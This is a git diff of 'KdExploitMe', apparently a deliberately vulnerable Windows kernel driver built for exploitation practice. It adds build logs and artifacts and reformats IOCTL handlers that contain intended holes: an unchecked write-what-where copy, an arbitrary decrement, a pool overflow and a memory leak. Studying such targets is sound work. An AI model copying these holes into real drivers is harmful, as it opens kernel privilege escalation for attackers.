+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|x64.ActiveCfg = Win7 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|x64.Build.0 = Win7 Release|x64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|ARM64.ActiveCfg = Debug|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|ARM64.Build.0 = Debug|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.ActiveCfg = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.Build.0 = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.Deploy.0 = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|x64.ActiveCfg = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|ARM64.ActiveCfg = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|ARM64.Build.0 = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.ActiveCfg = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.Build.0 = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.Deploy.0 = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|x64.ActiveCfg = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|ARM64.ActiveCfg = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|ARM64.Build.0 = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.ActiveCfg = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.Build.0 = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.Deploy.0 = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|x64.ActiveCfg = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|ARM64.ActiveCfg = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|ARM64.Build.0 = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.ActiveCfg = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.Build.0 = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.Deploy.0 = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|x64.ActiveCfg = Release|x64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|x64.Build.0 = Release|x64
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/KdExploitMe/ARM64/Win8.1 Release/HandleIOCTL.obj b/KdExploitMe/ARM64/Win8.1 Release/HandleIOCTL.obj
new file mode 100644
index 0000000..6e54fc3
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/HandleIOCTL.obj differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.Build.CppClean.log b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.Build.CppClean.log
new file mode 100644
index 0000000..d0e0277
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.Build.CppClean.log
@@ -0,0 +1,2 @@
+c:\users\ayush\source\repos\kdexploitme\kdexploitme\arm64\win8.1 release\vc143.pdb
+c:\users\ayush\source\repos\kdexploitme\kdexploitme\arm64\win8.1 release\kdexploitme.tlog\cl.command.1.tlog
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.log b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.log
new file mode 100644
index 0000000..8feebee
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.log
@@ -0,0 +1 @@
+LINK : fatal error LNK1104: cannot open file 'ntoskrnl.lib'
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.obj b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.obj
new file mode 100644
index 0000000..9010d4d
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.obj differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.command.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..4eec97f
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.command.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.read.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..c0bd0c4
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.read.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.write.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..5538588
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.write.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
new file mode 100644
index 0000000..d1e16ab
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=WindowsKernelModeDriver10.0:VCToolArchitecture=Native32Bit:VCToolsVersion=14.44.35207:TargetPlatformVersion=10.0.26100.0:
+Win8.1 Release|ARM64|C:\Users\ayush\Source\Repos\KdExploitMe\|
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.read.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.read.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.read.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.write.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.write.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.write.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.read.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.read.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.read.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.write.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.write.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.write.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.command.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.command.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.command.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.read.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.read.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.read.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.write.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.write.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.write.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/unsuccessfulbuild b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/unsuccessfulbuild
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.vcxproj.FileListAbsolute.txt b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe/ARM64/Win8.1 Release/vc143.pdb b/KdExploitMe/ARM64/Win8.1 Release/vc143.pdb
new file mode 100644
index 0000000..d4cabec
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/vc143.pdb differ
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.inf b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.inf
new file mode 100644
index 0000000..bae7fcd
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.inf
@@ -0,0 +1,32 @@
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer = 12/28/2025,11.25.39.263
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTARM64
+
+[Standard.NTARM64]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.log b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.log
new file mode 100644
index 0000000..7e1d600
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.log
@@ -0,0 +1,9 @@
+ Building 'KdExploitMe' with toolset 'WindowsKernelModeDriver10.0' and the 'Desktop' target platform.
+ Stamping ARM64\Win8.1Release\KdExploitMe.inf
+ Stamping [Version] section with DriverVer=12/28/2025,11.25.39.263
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf : error 1297: Device driver does not install on any devices, use primitive driver if this is intended.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(5-5): error 1234: Required directive Provider missing, empty, or invalid in [Version] section.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(5-5): error 1234: Required directive Class missing, empty, or invalid in [Version] section.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(5-5): error 1324: [Version] section should specify PnpLockdown=1 to prevent external apps from modifying installed driver files.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(8-8): error 1010: Invalid ClassGuid "", expecting {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(11-11): error 1233: Missing directive CatalogFile required for digital signature.
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
new file mode 100644
index 0000000..d1e16ab
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=WindowsKernelModeDriver10.0:VCToolArchitecture=Native32Bit:VCToolsVersion=14.44.35207:TargetPlatformVersion=10.0.26100.0:
+Win8.1 Release|ARM64|C:\Users\ayush\Source\Repos\KdExploitMe\|
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.command.1.tlog b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.command.1.tlog
new file mode 100644
index 0000000..c7cf495
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.command.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.read.1.tlog b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.read.1.tlog
new file mode 100644
index 0000000..d39b3cb
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.read.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.write.1.tlog b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.write.1.tlog
new file mode 100644
index 0000000..d39b3cb
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.write.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/unsuccessfulbuild b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/unsuccessfulbuild
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe/HandleIOCTL.cpp b/KdExploitMe/HandleIOCTL.cpp
index 0581599..c76da3e 100644
--- a/KdExploitMe/HandleIOCTL.cpp
+++ b/KdExploitMe/HandleIOCTL.cpp
@@ -1,113 +1,113 @@
-#pragma once
-
-#include "HandleIOCTL.h"
-
-
-NTSTATUS WriteWhatWhere(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDATACOPY dataCopy)
-{
- NTSTATUS ntStatus = STATUS_SUCCESS;
-
- UNREFERENCED_PARAMETER(DeviceObject);
- UNREFERENCED_PARAMETER(Irp);
-
- try
- {
- //Verify that the structure being read is in usermode
- ProbeForRead(dataCopy, sizeof(DATACOPY), sizeof(UCHAR));
- }
- except(EXCEPTION_EXECUTE_HANDLER)
- {
-
- ntStatus = GetExceptionCode();
- goto Cleanup;
- }
-
-
- if (dataCopy->DestLength < dataCopy->SourceLength)
- {
- ntStatus = STATUS_INVALID_BUFFER_SIZE;
- goto Cleanup;
- }
-
- //Vuln: Don't verify where the pointers in the structure are located
- RtlCopyMemory(dataCopy->Dest, dataCopy->Source, dataCopy->SourceLength);
-
-
-Cleanup:
- return ntStatus;
-}
-
-NTSTATUS DecAddress(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDECADDRESS data)
-{
- NTSTATUS ntStatus = STATUS_SUCCESS;
-
- UNREFERENCED_PARAMETER(DeviceObject);
- UNREFERENCED_PARAMETER(Irp);
-
- try
- {
- //Verify that the structure being read is in usermode
- ProbeForRead(data, sizeof(DECADDRESS), sizeof(UCHAR));
- }
- except(EXCEPTION_EXECUTE_HANDLER)
- {
-
- ntStatus = GetExceptionCode();
- goto Cleanup;
- }
-
- if (data->Dec == TRUE)
- {
- (*(data->Value))--;
- }
-
-Cleanup:
- return ntStatus;
-}
-
-NTSTATUS OverflowPool(PDEVICE_OBJECT DeviceObject, PIRP Irp, POVERFLOW_PAGEDPOOL Buf)
-{
- UNREFERENCED_PARAMETER(DeviceObject);
- UNREFERENCED_PARAMETER(Irp);
- NTSTATUS ntStatus = STATUS_SUCCESS;
-
- PVOID mem = ExAllocatePoolWithTag(Buf->PoolType, Buf->AllocationSize, EXPLOITPOOLTAG);
- if (!mem)
- {
- ntStatus = STATUS_NO_MEMORY;
- goto Error;
- }
-
- RtlCopyMemory(mem, Buf->UserData.Buffer, Buf->UserData.Length * sizeof(WCHAR));
-
-Cleanup:
- return ntStatus;
-
-Error:
- if (mem != NULL)
- {
- ExFreePoolWithTag(mem, EXPLOITPOOLTAG);
- mem = NULL;
- }
-
- goto Cleanup;
-}
-
-NTSTATUS Leak(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID inBuf, ULONG inBufSize, PVOID outBuff, ULONG outBuffSize)
-{
- UNREFERENCED_PARAMETER(DeviceObject);
- UNREFERENCED_PARAMETER(Irp);
-
- NTSTATUS ntStatus = 0;
-
- if (inBufSize > outBuffSize)
- {
- ntStatus = STATUS_NO_MEMORY;
- goto Cleanup;
- }
-
- RtlCopyMemory(outBuff, inBuf, inBufSize);
-
-Cleanup:
- return ntStatus;
+#pragma once
+
+#include "HandleIOCTL.h"
+
+
+NTSTATUS WriteWhatWhere(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDATACOPY dataCopy)
+{
+ NTSTATUS ntStatus = STATUS_SUCCESS;
+
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(Irp);
+
+ __try
+ {
+ //Verify that the structure being read is in usermode
+ ProbeForRead(dataCopy, sizeof(DATACOPY), sizeof(UCHAR));
+ }
+ __except(EXCEPTION_EXECUTE_HANDLER)
+ {
+
+ ntStatus = GetExceptionCode();
+ goto Cleanup;
+ }
+
+
+ if (dataCopy->DestLength < dataCopy->SourceLength)
+ {
+ ntStatus = STATUS_INVALID_BUFFER_SIZE;
+ goto Cleanup;
+ }
+
+ //Vuln: Don't verify where the pointers in the structure are located
+ RtlCopyMemory(dataCopy->Dest, dataCopy->Source, dataCopy->SourceLength);
+
+
+Cleanup:
+ return ntStatus;
+}
+
+NTSTATUS DecAddress(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDECADDRESS data)
+{
+ NTSTATUS ntStatus = STATUS_SUCCESS;
+
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(Irp);
+
+ __try
+ {
+ //Verify that the structure being read is in usermode
+ ProbeForRead(data, sizeof(DECADDRESS), sizeof(UCHAR));
+ }
+ __except(EXCEPTION_EXECUTE_HANDLER)
+ {
+
+ ntStatus = GetExceptionCode();
+ goto Cleanup;
+ }
+
+ if (data->Dec == TRUE)
+ {
+ (*(data->Value))--;
+ }
+
+Cleanup:
+ return ntStatus;
+}
+
+NTSTATUS OverflowPool(PDEVICE_OBJECT DeviceObject, PIRP Irp, POVERFLOW_PAGEDPOOL Buf)
+{
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(Irp);
+ NTSTATUS ntStatus = STATUS_SUCCESS;
+
+ PVOID mem = ExAllocatePoolWithTag(Buf->PoolType, Buf->AllocationSize, EXPLOITPOOLTAG);
+ if (!mem)
+ {
+ ntStatus = STATUS_NO_MEMORY;
+ goto Error;
+ }
+
+ RtlCopyMemory(mem, Buf->UserData.Buffer, Buf->UserData.Length * sizeof(WCHAR));
+
+Cleanup:
+ return ntStatus;
+
+Error:
+ if (mem != NULL)
+ {
+ ExFreePoolWithTag(mem, EXPLOITPOOLTAG);
+ mem = NULL;
+ }
+
+ goto Cleanup;
+}
+
+NTSTATUS Leak(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID inBuf, ULONG inBufSize, PVOID outBuff, ULONG outBuffSize)
+{
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(Irp);
+
+ NTSTATUS ntStatus = 0;
+
+ if (inBufSize > outBuffSize)
+ {
+ ntStatus = STATUS_NO_MEMORY;
+ goto Cleanup;
+ }
+
+ RtlCopyMemory(outBuff, inBuf, inBufSize);
+
+Cleanup:
+ return ntStatus;
}
\ No newline at end of file
diff --git a/KdExploitMe/HandleIOCTL.h b/KdExploitMe/HandleIOCTL.h
index fc44f08..2588828 100644
--- a/KdExploitMe/HandleIOCTL.h
+++ b/KdExploitMe/HandleIOCTL.h
@@ -1,11 +1,11 @@
-#pragma once
-
-#include // various NT definitions
-#include "Structures.h"
-
-#define EXPLOITPOOLTAG 'dnwP'
-
-NTSTATUS WriteWhatWhere(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDATACOPY dataCopy);
-NTSTATUS DecAddress(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDECADDRESS data);
-NTSTATUS OverflowPool(PDEVICE_OBJECT DeviceObject, PIRP Irp, POVERFLOW_PAGEDPOOL Buf);
+#pragma once
+
+#include // various NT definitions
+#include "Structures.h"
+
+#define EXPLOITPOOLTAG 'dnwP'
+
+NTSTATUS WriteWhatWhere(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDATACOPY dataCopy);
+NTSTATUS DecAddress(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDECADDRESS data);
+NTSTATUS OverflowPool(PDEVICE_OBJECT DeviceObject, PIRP Irp, POVERFLOW_PAGEDPOOL Buf);
NTSTATUS Leak(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID inBuf, ULONG inBufSize, PVOID outBuff, ULONG outBuffSize);
\ No newline at end of file
diff --git a/KdExploitMe/KdExploitMe.cpp b/KdExploitMe/KdExploitMe.cpp
index 68483b8..68fad3b 100644
--- a/KdExploitMe/KdExploitMe.cpp
+++ b/KdExploitMe/KdExploitMe.cpp
@@ -1,386 +1,378 @@
-//
-// Include files.
-//
-
-#include // various NT definitions
-#include
-
-#include "KdExploitMe.h"
-#include "HandleIOCTL.h"
-#include "Structures.h"
-
-#define NT_DEVICE_NAME L"\\Device\\KdExploitMe"
-#define DOS_DEVICE_NAME L"\\DosDevices\\KdExploitMe"
-
-#if DBG
-#define PrettyDbgPrint(_x_) \
- DbgPrint("KdExploitMe.SYS: "); \
- DbgPrint _x_;
-
-#else
-#define PrettyDbgPrint(_x_)
-#endif
-
-//
-// Device driver routine declarations.
-//
-
-DRIVER_INITIALIZE DriverEntry;
-
-_Dispatch_type_(IRP_MJ_CREATE)
-_Dispatch_type_(IRP_MJ_CLOSE)
-DRIVER_DISPATCH DriverCreateClose;
-
-_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
-DRIVER_DISPATCH DriverDeviceControl;
-
-DRIVER_UNLOAD DriverUnloadControl;
-
-VOID
-PrintIrpInfo(
-PIRP Irp
-);
-VOID
-PrintChars(
-_In_reads_(CountChars) PCHAR BufferAddress,
-_In_ size_t CountChars
-);
-
-#ifdef ALLOC_PRAGMA
-#pragma alloc_text( INIT, DriverEntry )
-#pragma alloc_text( PAGE, DriverCreateClose)
-#pragma alloc_text( PAGE, DriverDeviceControl)
-#pragma alloc_text( PAGE, DriverUnloadControl)
-#pragma alloc_text( PAGE, PrintIrpInfo)
-#pragma alloc_text( PAGE, PrintChars)
-#endif // ALLOC_PRAGMA
-
-
-NTSTATUS
-DriverEntry(
-_In_ PDRIVER_OBJECT DriverObject,
-_In_ PUNICODE_STRING RegistryPath
-)
-/*++
-
-Routine Description:
-This routine is called by the Operating System to initialize the driver.
-
-It creates the device object, fills in the dispatch entry points and
-completes the initialization.
-
-Arguments:
-DriverObject - a pointer to the object that represents this device
-driver.
-
-RegistryPath - a pointer to our Services key in the registry.
-
-Return Value:
-STATUS_SUCCESS if initialized; an error otherwise.
-
---*/
-
-{
- NTSTATUS ntStatus;
- UNICODE_STRING ntUnicodeString; // NT Device Name "\Device\WDMDriver"
- UNICODE_STRING ntWin32NameString; // Win32 Name "\DosDevices\IoctlTest"
- PDEVICE_OBJECT deviceObject = NULL; // ptr to device object
-
- UNREFERENCED_PARAMETER(RegistryPath);
-
- RtlInitUnicodeString(&ntUnicodeString, NT_DEVICE_NAME);
-
- ntStatus = IoCreateDevice(
- DriverObject, // Our Driver Object
- 0, // We don't use a device extension
- &ntUnicodeString, // Device name "\Device\KdExploitMe"
- FILE_DEVICE_UNKNOWN, // Device type
- FILE_DEVICE_SECURE_OPEN, // Device characteristics
- FALSE, // Not an exclusive device
- &deviceObject); // Returned ptr to Device Object
-
- if (!NT_SUCCESS(ntStatus))
- {
- PrettyDbgPrint(("Couldn't create the device object\n"));
- return ntStatus;
- }
-
- //
- // Initialize the driver object with this driver's entry points.
- //
-
- DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverCreateClose;
- DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverCreateClose;
- DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDeviceControl;
- DriverObject->DriverUnload = DriverUnloadControl;
-
- //
- // Initialize a Unicode String containing the Win32 name
- // for our device.
- //
-
- RtlInitUnicodeString(&ntWin32NameString, DOS_DEVICE_NAME);
-
- //
- // Create a symbolic link between our device name and the Win32 name
- //
-
- ntStatus = IoCreateSymbolicLink(
- &ntWin32NameString, &ntUnicodeString);
-
- if (!NT_SUCCESS(ntStatus))
- {
- //
- // Delete everything that this routine has allocated.
- //
- PrettyDbgPrint(("Couldn't create symbolic link\n"));
- IoDeleteDevice(deviceObject);
- }
-
-
- return ntStatus;
-}
-
-
-NTSTATUS
-DriverCreateClose(
-PDEVICE_OBJECT DeviceObject,
-PIRP Irp
-)
-/*++
-
-Routine Description:
-
-This routine is called by the I/O system when the KdExploitMe is opened or
-closed.
-
-No action is performed other than completing the request successfully.
-
-Arguments:
-
-DeviceObject - a pointer to the object that represents the device
-that I/O is to be done on.
-
-Irp - a pointer to the I/O Request Packet for this request.
-
-Return Value:
-
-NT status code
-
---*/
-
-{
- UNREFERENCED_PARAMETER(DeviceObject);
-
- PAGED_CODE();
-
- Irp->IoStatus.Status = STATUS_SUCCESS;
- Irp->IoStatus.Information = 0;
-
- IoCompleteRequest(Irp, IO_NO_INCREMENT);
-
- return STATUS_SUCCESS;
-}
-
-VOID
-DriverUnloadControl(
-_In_ PDRIVER_OBJECT DriverObject
-)
-/*++
-
-Routine Description:
-
-This routine is called by the I/O system to unload the driver.
-
-Any resources previously allocated must be freed.
-
-Arguments:
-
-DriverObject - a pointer to the object that represents our driver.
-
-Return Value:
-
-None
---*/
-
-{
- PDEVICE_OBJECT deviceObject = DriverObject->DeviceObject;
- UNICODE_STRING uniWin32NameString;
-
- PAGED_CODE();
-
- //
- // Create counted string version of our Win32 device name.
- //
-
- RtlInitUnicodeString(&uniWin32NameString, DOS_DEVICE_NAME);
-
-
- //
- // Delete the link from our device name to a name in the Win32 namespace.
- //
-
- IoDeleteSymbolicLink(&uniWin32NameString);
-
- if (deviceObject != NULL)
- {
- IoDeleteDevice(deviceObject);
- }
-
-
-
-}
-
-NTSTATUS
-DriverDeviceControl(
-PDEVICE_OBJECT DeviceObject,
-PIRP Irp
-)
-
-/*++
-
-Routine Description:
-
-This routine is called by the I/O system to perform a device I/O
-control function.
-
-Arguments:
-
-DeviceObject - a pointer to the object that represents the device
-that I/O is to be done on.
-
-Irp - a pointer to the I/O Request Packet for this request.
-
-Return Value:
-
-NT status code
-
---*/
-
-{
- PIO_STACK_LOCATION irpSp;// Pointer to current stack location
- NTSTATUS ntStatus = STATUS_SUCCESS;// Assume success
- ULONG inBufLength; // Input buffer length
- ULONG outBufLength; // Output buffer length
- PCHAR inBuf; // pointer to Input and output buffer
-// PCHAR data = "This String is from Device Driver !!!";
-// size_t datalen = strlen(data) + 1;//Length of data including null
-// PMDL mdl = NULL;
-// PCHAR buffer = NULL;
-
- UNREFERENCED_PARAMETER(DeviceObject);
-
- PAGED_CODE();
-
- irpSp = IoGetCurrentIrpStackLocation(Irp);
- inBufLength = irpSp->Parameters.DeviceIoControl.InputBufferLength;
- outBufLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;
-
- if (!inBufLength || !outBufLength)
- {
- ntStatus = STATUS_INVALID_PARAMETER;
- goto End;
- }
-
- //
- // Determine which I/O control code was specified.
- //
-
- switch (irpSp->Parameters.DeviceIoControl.IoControlCode)
- {
- case IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE:
- inBuf = irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
-
- ntStatus = WriteWhatWhere(DeviceObject, Irp, (PDATACOPY)inBuf);
-
- break;
- case IOCTL_KDEXPLOITME_METHOD_DECADDRESS:
- inBuf = irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
-
- ntStatus = DecAddress(DeviceObject, Irp, (PDECADDRESS)inBuf);
- break;
- case IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL:
- inBuf = Irp->AssociatedIrp.SystemBuffer;
- ntStatus = OverflowPool(DeviceObject, Irp, (POVERFLOW_PAGEDPOOL)inBuf);
- break;
- case IOCTL_KDEXPLOITME_METHOD_READMEM:
- inBuf = irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
- ntStatus = Leak(DeviceObject, Irp, inBuf, irpSp->Parameters.DeviceIoControl.InputBufferLength, Irp->UserBuffer, irpSp->Parameters.DeviceIoControl.OutputBufferLength);
- break;
- default:
-
- //
- // The specified I/O control code is unrecognized by this driver.
- //
-
- ntStatus = STATUS_INVALID_DEVICE_REQUEST;
- PrettyDbgPrint(("ERROR: unrecognized IOCTL %x\n",
- irpSp->Parameters.DeviceIoControl.IoControlCode));
- break;
- }
-
-End:
- //
- // Finish the I/O operation by simply completing the packet and returning
- // the same status as in the packet itself.
- //
-
- Irp->IoStatus.Status = ntStatus;
-
